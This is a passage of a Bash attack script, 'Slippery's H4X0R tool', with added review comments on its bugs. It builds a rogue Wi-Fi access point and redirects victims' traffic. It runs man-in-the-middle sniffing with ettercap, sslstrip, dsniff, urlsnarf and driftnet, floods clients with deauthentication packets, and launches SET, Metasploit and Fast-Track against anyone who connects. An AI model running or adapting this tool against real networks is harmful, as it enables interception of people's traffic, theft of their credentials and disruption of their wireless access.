  elif [ "$DO" == "attack" ]; then
    iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j DNAT --to "$IFACEIP";
  else
    echo "******************************************************************";
    echo "Enter 'sniff' or 'attack' only!!!";
    exit 0
  fi
  echo "******************************************************************";
  echo "Setting up the DHCP server and running it";
  echo "******************************************************************";
  # The first echo uses > (truncate); everything after appends.
  echo "ddns-update-style none;" > /etc/dhcp3/dhcpd.conf
  echo "authoritative;" >> /etc/dhcp3/dhcpd.conf
  echo "default-lease-time 600;" >> /etc/dhcp3/dhcpd.conf
  echo "max-lease-time 7200;" >> /etc/dhcp3/dhcpd.conf
  echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /etc/dhcp3/dhcpd.conf
  echo "option routers 10.0.0.1;" >> /etc/dhcp3/dhcpd.conf
  echo "option subnet-mask 255.255.255.0;" >> /etc/dhcp3/dhcpd.conf
  echo "option broadcast-address 10.0.0.255;" >> /etc/dhcp3/dhcpd.conf
  echo "option domain-name-servers "$GW";" >> /etc/dhcp3/dhcpd.conf
  echo "range 10.0.0.10 10.0.0.20;" >> /etc/dhcp3/dhcpd.conf
  echo "}" >> /etc/dhcp3/dhcpd.conf;
  mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd;
  echo > /var/lib/dhcp3/dhcpd.leases;
  xterm -hold -bg black -fg blue -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &
  echo "Launching DHCP entries log";
  xterm -bg black -fg blue -T "DHCP log" -e tail -f /var/log/messages &>/dev/null &
}

#Cleans up processes made by this script
# Globals read: MIFACE, WIFACE.
# NOTE(review): the killall is backgrounded (&), so the iptables flush, airmon-ng stop and
# file truncation below race with the processes being terminated.
# NOTE(review): this is a reset, not a restore — ip_forward is forced to 0 and every chain in
# the filter and nat tables is flushed and deleted regardless of what was there before the
# script ran.  It ends by opening the author's blog in firefox.
function cleanup(){
  clear;
  echo 0 > /proc/sys/net/ipv4/ip_forward;
  killall -q arpspoof dhcpd3 airbase-ng aireplay-ng ettercap sslstrip driftnet urlsnarf dsniff xterm tail &>/dev/null &
  iptables --flush;
  iptables --table nat --flush;
  iptables --delete-chain;
  iptables --table nat --delete-chain;
  airmon-ng stop "$MIFACE";
  airmon-ng stop "$WIFACE";
  ifconfig "$WIFACE" down;
  ifconfig "$WIFACE" up;
  echo > /etc/dhcp3/dhcpd.conf;
  echo > /var/lib/dhcp3/dhcpd.leases;
  firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
}

#Sets up the sniffing methods and calls the Rogue AP function automatically
# Globals read: AP, GW.  Globals set: CHOICE.
# Edits /etc/etter.conf in place (sed -i, no backup copy) when the two redir_command lines
# are still commented out; the edit is permanent and is not reverted by cleanup().
# NOTE(review): `sudo ettercap` is redundant in a script that already demands root, and any
# sudo prompt would appear only in the xterm whose output is discarded.
# NOTE(review): the menu loop never checks the status of `read CHOICE`; on EOF (closed stdin)
# CHOICE is empty, no case arm matches and the loop spins without ever blocking.  The same
# applies to the loops in attackap and the start menu.
# showMenu is a global name: this definition replaces the start-menu one while sniffap runs,
# and is itself replaced when attackap (choice 7) runs.
function sniffap(){
  clear;
  echo "******************************************************************";
  echo "Checking to see if your ready to run ettercap...";
  echo "******************************************************************";
  if cat /etc/etter.conf | grep -q '#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"'; then
    sed -i 's/#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    sed -i 's/#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"/' /etc/etter.conf;
    echo "Uncommented your iptables in /etc/etter.conf for you :)";
  fi
  iptables -t nat -A PREROUTING -p udp -j DNAT --to "$GW";
  mirror;
  read -p "Press ENTER to start ettercap after you have someone connected to "$AP""
  xterm -hold -bg black -fg blue -T "ettercap" -e sudo ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 /"$GW"/ // &>/dev/null &
  #sudo ettercap -G &>/dev/null &
  sleep 7;
  echo "******************************************************************";
  echo "If ettercap is now sniffing then startup some other fun tools";
  echo "******************************************************************";
  showMenu () {
    echo
    echo "1) sslstrip"
    echo "2) driftnet"
    echo "3) urlsnarf"
    echo "4) dsniff"
    echo "5) Add your own tool"
    echo "6) Deauth victim"
    echo "7) Stop sniffing and start attacking"
    echo "8) Exit and cleanup"
    echo "9) Exit and leave everything running"
    echo
  }
  while [ 1 ]
  do
    showMenu
    read CHOICE
    case "$CHOICE" in
      "1")
        echo "Setting up sslstrip";
        xterm -bg black -fg blue -T "sslstrip" -e sslstrip -a -k -f -l 8080 &>/dev/null &
        sleep 1;
        xterm -bg black -fg blue -T "sslstrip log" -e tail -f sslstrip.log &>/dev/null &
        ;;
      "2")
        echo "Setting up driftnet";
        xterm -bg black -fg blue -T "driftnet" -e driftnet -v -i at0 &>/dev/null &
        ;;
      "3")
        echo "Setting up urlsnarf";
        xterm -bg black -fg blue -T "urlsnarf" -e urlsnarf -i at0 &>/dev/null &
        ;;
      "4")
        echo "Setting up dsniff";
        xterm -bg black -fg blue -T "dsniff" -e dsniff -m -i at0 -d -s 4096 -w dsniff$(date +%F-%H%M).log &>/dev/null &
        ;;
      "5")
        echo "******************************************************************";
        echo "What other sniffing tools are you planning to use? Email me slippery@shellium.org";
        xterm -bg black -fg blue &>/dev/null &
        echo "******************************************************************";
        ;;
      "6") deauth; ;;
      "7") attackap; ;;
      "8")
        echo "******************************************************************";
        echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
        echo "******************************************************************";
        cleanup;
        exit 0
        ;;
      "9")
        echo "******************************************************************";
        echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
        echo "******************************************************************";
        firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
        exit 0
        ;;
    esac
  done
}

#Sets up the deauth method for your Rogue Ap
# Globals read: MIFACE.  Globals set: APMAC, CHAN, OA, DP, CMAC.
# Every external tool runs in a backgrounded xterm with output discarded, so nothing here
# reports success or failure back to the script.
function deauth(){
  echo "******************************************************************";
  xterm -hold -bg black -fg blue -T "airodump-ng" -e airodump-ng "$MIFACE" &>/dev/null &
  echo "You should see a new window, let it run for 10 seconds.....";
  sleep 10;
  echo "You should now see some activity";
  echo "******************************************************************";
  echo "Enter the MAC of the network you wish to deauth";
  read APMAC;
  echo "Using "$APMAC" as the network to deauth";
  echo "******************************************************************";
  echo "Enter the channel of the network you wish to deauth";
  read CHAN;
  echo "Using channel "$CHAN""
  echo "******************************************************************";
  echo "Do you want to deauth all clients or just 1 client? (all or one)";
  read OA;
  echo "******************************************************************";
  echo "Enter the number of deauth packets to send, (5-10 normally) Note: 0 means to send them continuously";
  read DP;
  echo "******************************************************************";
  if [ "$OA" == "all" ]; then
    echo "Deauthing all clients on "$APMAC" with "$DP" Packets";
    xterm -hold -bg black -fg blue -T "aireplay-ng" -e aireplay-ng --deauth "$DP" -a "$APMAC" "$MIFACE" &>/dev/null &
  elif [ "$OA" == "one" ]; then
    killall -q airodump-ng;
    xterm -hold -bg black -fg blue -T "airodump-ng" -e airodump-ng -c "$CHAN" --bssid "$APMAC" -w airodump$(date +%F-%H%M).log "$MIFACE" &>/dev/null &
    echo "Enter the Client's MAC address connected to "$APMAC"";
    echo "******************************************************************";
    read CMAC;
    echo "******************************************************************";
    echo "Deauthing "$CMAC" on "$APMAC" with "$DP" Packets";
    echo "******************************************************************";
    xterm -hold -bg black -fg blue -T "aireplay-ng" -e aireplay-ng --deauth "$DP" -a "$APMAC" -c "$CMAC" "$MIFACE" &>/dev/null &
  else
    echo "******************************************************************";
    echo "Enter 'all or 'one' only!!!";
    exit 0
  fi
}

#Sets up the attack methods for your Rogue AP
# Globals set: CHOICE.  Redefines the global showMenu for the duration of this menu.
# In arms 2-4 the `cd DIR && xterm ... &` list is backgrounded as a whole, so the cd happens
# in the asynchronous subshell and the script's own working directory is unchanged; a missing
# DIR simply means the xterm is never started, silently.
# Arm 6 runs mirror, which eventually calls apsetup with DO already set by qrogueap.
function attackap(){
  clear;
  echo "******************************************************************";
  echo "You have choosen to attack, Select some tools to start attacking, then launch your Rogue AP";
  echo "******************************************************************";
  showMenu () {
    echo
    echo "1) SimpleHTTPServer port 80"
    echo "2) Social Engineering Toolkit"
    echo "3) Metasploit"
    echo "4) Fast-Track"
    echo "5) Add your own tool"
    echo "6) Launch your Rogue AP"
    echo "7) Deauth victim"
    echo "8) Exit and cleanup"
    echo "9) Exit and leave everything running"
    echo
  }
  while [ 1 ]
  do
    showMenu
    read CHOICE
    case "$CHOICE" in
      "1")
        echo "Setting up SimpleHTTPServer on port 80 in "$PWD"";
        xterm -bg black -fg blue -T "SimpleHTTPServer" -e python -m SimpleHTTPServer 80 &>/dev/null &
        sleep 3;
        ;;
      "2")
        echo "Setting up Social Engineering Toolkit";
        cd /pentest/exploits/SET && xterm -bg black -fg blue -T "Social Engineering Toolkit" -e ./set &>/dev/null &
        sleep 10;
        ;;
      "3")
        echo "Setting up Metasploit.........";
        cd /pentest/exploits/framework3 && xterm -bg black -fg blue -T "Metasploit" -e ./msfconsole &>/dev/null &
        sleep 2;
        echo "Few more seconds......";
        sleep 15;
        ;;
      "4")
        echo "Setting up Fast-Track";
        cd /pentest/exploits/fasttrack/ && xterm -bg black -fg blue -T "Fast-Track" -e ./fast-track.py -i &>/dev/null &
        sleep 10;
        ;;
      "5")
        echo "******************************************************************";
        echo "What other attacks are you planning? Email me slippery@shellium.org";
        xterm -bg black -fg blue &>/dev/null &
        echo "******************************************************************";
        ;;
      "6") mirror; ;;
      "7") deauth; ;;
      "8")
        echo "******************************************************************";
        echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
        echo "******************************************************************";
        cleanup;
        exit 0
        ;;
      "9")
        echo "******************************************************************";
        echo "*******ThAnK yOu FoR cHoOsInG sLiPpErY's H4X0R tOoL!********";
        echo "******************************************************************";
        firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html
        exit 0
        ;;
    esac
  done
}

# Defines if you want to sniff or attack the Rogue AP
# Globals read: AP.  Globals set: DO, which apsetup later switches on.
function qrogueap(){
  clear;
  echo "Do you want to sniff or attack "$AP"? (sniff or attack)";
  read DO;
  if [ "$DO" == "sniff" ]; then
    sniffap;
  elif [ "$DO" == "attack" ]; then
    attackap;
  else
    echo "******************************************************************";
    echo "Enter 'sniff' or 'attack' only!!!";
    exit 0
  fi
}

#Start Menu
# NOTE(review): the root check is ineffective — `exit 0` runs inside a ( ) subshell, so a
# non-root user only sees the message and the menu continues.  To actually stop, the exit has
# to run in the main shell, e.g. `test "$(whoami)" != 'root' && { echo YOU MUST RUN THIS AS ROOT; exit 1; }`.
# This global showMenu is replaced by the definitions inside sniffap and attackap once those run.
showMenu () {
  test "$(whoami)" != 'root' && (echo YOU MUST RUN THIS AS ROOT; exit 0)
  echo
  echo "*******Please select a choice below*******"
  echo "1) H4X0R a network your already connected to"
  echo "2) Create a Rogue Ap and H4X0R it"
  echo "3) Crack WEP"
  echo "4) Need Help?"
  echo "5) Update Tools"
  echo
}

# Main loop.  subnetscript and rogueapscript are defined earlier in the file (not in this
# section).  As in sniffap, `read CHOICE` is never checked, so EOF on stdin makes this loop
# spin without blocking.
while [ 1 ]
do
  showMenu
  read CHOICE
  case "$CHOICE" in
    "1") subnetscript; ;;
    "2") rogueapscript; ;;
    "3")
      #Have only 1 tool uncommented below (use the apt-get line only to install wifite witch is my favorite tool btw...)#
      # apt-get update && apt-get install wifite #
      # NOTE(review): which of these lines is live was reconstructed from the author's comment
      # above and the file's feature list; verify against the original layout.
      wepcrack;
      #grimwepa &
      #sh -c "python wifite.py; sudo -s" &
      ;;
    "4") firefox http://xslipperyh4x0r.blogspot.com/2010/10/slipperys-h4x0r-tool.html ;;
    "5")
      # NOTE(review): none of the cd calls is guarded, so if a directory is missing the
      # following svn up / update command runs in whatever directory the previous step left.
      # These cds also change the script's working directory permanently for later menu choices.
      echo "Updating tools......"
      cd /pentest/wireless/aircrack-ng/; svn up;
      cd /pentest/exploits/framework3/; svn up;
      cd /pentest/exploits/SET/; ./set-update;
      cd /pentest/exploits/fasttrack/; svn up;
      cd /pentest/wireless/wifite/; python wifite.py -upgrade;
      ;;
  esac
done